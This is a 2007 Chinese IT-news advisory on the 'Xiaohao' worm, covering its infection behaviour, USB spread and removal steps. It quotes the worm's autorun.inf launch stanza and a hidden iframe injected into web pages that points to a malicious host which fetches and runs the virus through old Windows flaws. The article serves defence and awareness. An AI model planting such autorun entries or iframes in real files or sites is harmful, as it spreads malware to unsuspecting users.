近期热点
·信息网络安全防范的几种措施
·企业网络安全的规划设计与实践
·网络安全之我见
·制造执行系统(MES)的应用与发展
·PDM与CAX、ERP集成技术研究
·微波EDA电磁仿真软件应用
 相关文章
·企业信息安全状况堪忧,管理不当成首要问题
·边制毒边杀毒 杀毒黑客徘徊天使魔鬼间
·新型垃圾邮件肆虐 中小企业如何自保
·做足安全 局域网的防护之门
·轻松防范U盘病毒Autorun.inf的五大绝招
·网管须知 局域网病毒防范难在何处
 相关博客
·解剖手机——把病毒划开来看看
·2007年上半年十大病毒档案
·论库存的惯性及其解决办法
·[转贴]熊猫烧香被恶搞 网友爆笑诗词句大集合
·“熊猫”化身“金猪”病毒"密谋"大闹春节
·如何手工清除“熊猫烧香”病毒
 相关新闻
·
“网页收割者”病毒假冒微软网站 恶性木马疯狂传播
·
趋势科技OfficeScan8.0获得微软Vista认证
·
国产杀毒软件已经牢牢控制国内市场
·
Windows系统再现高危漏洞
·
恶性病毒针对主流杀毒软件开战
·
首例感染文件的盗号木马现身 可造成系统异常
 相关热贴
·计算机病毒纪年
·中国计算机病毒发展史
·病毒预报 第二百四十四期(2007.10.1-2007.10.7)
·十大流行病毒公布 木马代理居07年流行榜首
·常见病毒手工清除方法大集锦
·病毒预报 第二百四十三期(2007.9.24-2007.9.30)
 相关商城商品
 
 
当前位置:基础信息化 -> 防病毒
 
破坏力超过“熊猫烧香” “小浩”蠕虫病毒查杀办法
发表时间:2007-8-20 张宝林   来源:
关键字:病毒 熊猫烧香 小浩 办法 
8月14日,一种名为“小浩”蠕虫病毒出现在网络上,该病毒和“熊猫烧香”蠕虫病毒类似,可以感染 *.exe可执行程序,可以通过U盘传播,还会感染各种网页脚本程序,插入带毒网址,但是与“熊猫烧香”蠕虫病毒不同的是,被感染后的*.exe文件将遭到破坏且无法恢复!

    该病毒详细技术特征如下:

    病毒名称:Worm/XiaoHao.a
    中 文 名:小浩蠕虫
    病毒类型:蠕虫
    危害等级:★★★★
    影响平台:Win 9X/ME/NT/2000/XP/2003
    病毒运行特征:
    Worm/XiaoHao.a 蠕虫采用Visual C++6.0 工具编写,并经过UPX工具加壳处理,病毒运行后,会在每个硬盘跟目录下释放病毒文件:
    c:\xiaohao.exe, 402706字节
    c:\autorun.inf, 91字节
    其中xiaohao.exe 文件为病毒主体,该文件运行后搜索全盘扩展名为*.exe 的文件,将自身病毒体写入到正常文件中,从而使原文件成为新的病毒体,被感染后的文件图标为一个表示有“浩”字的图标,当浏览含有被感染病毒文件的窗口时,窗口的标题栏会有已中毒 X14o-H4o's Virus 的字样。

    如下图:

    由于该病毒采用的是覆盖式写入,因此被感染后的文件无法恢复。

    该病毒进程还会创建iexplore.exe 子进程,利用多个系统漏洞下载木马病毒。

    另外,病毒还在各个硬盘跟目录下释放的autorun.inf 文件是病毒主体的伴生文件,该文件内容如下:

    [Autorun]
    open=Xiaohao.exe
    shellexecute=Xiaohao.exe
    shell\Auto\command=Xiaohao.exe

    这样,该病毒就可以利用Windows系统的自动播放功能借助与U盘来传播,当用户在不知情的情况下,双击已感染该病毒的U盘时,就会将病毒传播到新的系统中。

    该病毒还会搜索全盘中扩展名为*.htm、*.html、*.asp、*.aspx、*.php、*.jsp 的网页脚本文件,向其中插入恶意网址连接<iframe src=http://xiaohao.yona.biz/***.htm width=0 height=0></iframe>,该病毒网址会利用MS06-014、MS06-046、MS07-017 等多个系统漏洞下载并且执行病毒文件http://xiaohao.yona.biz/***.exe ,该文件为病毒体自身。

    该病毒会将系统时间修改为2005年1月17日,使一些杀毒软件的使用授权失效,病毒还会模拟鼠标操作,企图绕过杀毒软件的主动防御功能。

    该病毒会将其他未被感染的文件设置成隐藏属性,还会生成文件:c:\Jilu.txt,用以记录被感染的文件和被隐藏的文件。该病毒还会破坏注册表相关键值,使其不能显示隐藏文件,严重影响了电脑的正常使用。

    据悉,该病毒作者还将病毒源代码公开在互联网中,并且还留下了自己的QQ号和博客地址,称“欢迎各位大牛. 来指导我  或者是交流” ,具有明显的技术炫耀性。

    建议广大用户:

    1、安装杀毒软件,开启每天定时升级病毒库,定时杀毒功能,并开启所有的监控功能。
    2、禁用系统的自动播放功能,防止病毒从U盘、移动硬盘、MP3等移动存储设备进入到计算机。
       禁用Windows 系统的自动播放功能的方法:在运行中输入 gpedit.msc 后回车,打开组策略编辑器,依次点击:计算机配置->管理模板->系统->关闭自动播放->已启用->所有驱动器->确定。
    3、利用Windows Update功能打全系统补丁,避免病毒从网页木马的方式入侵到系统中。

 

    本文为授权转载文章,任何人未经原授权方同意,不得复制、转载、摘编等任何方式进行使用,e-works不承担由此而产生的任何法律责任! 如有异议请及时告之,以便进行及时处理。联系方式:editor@e-works.net.cn tel:027-87592219/20/21。
 责任编辑:张宝林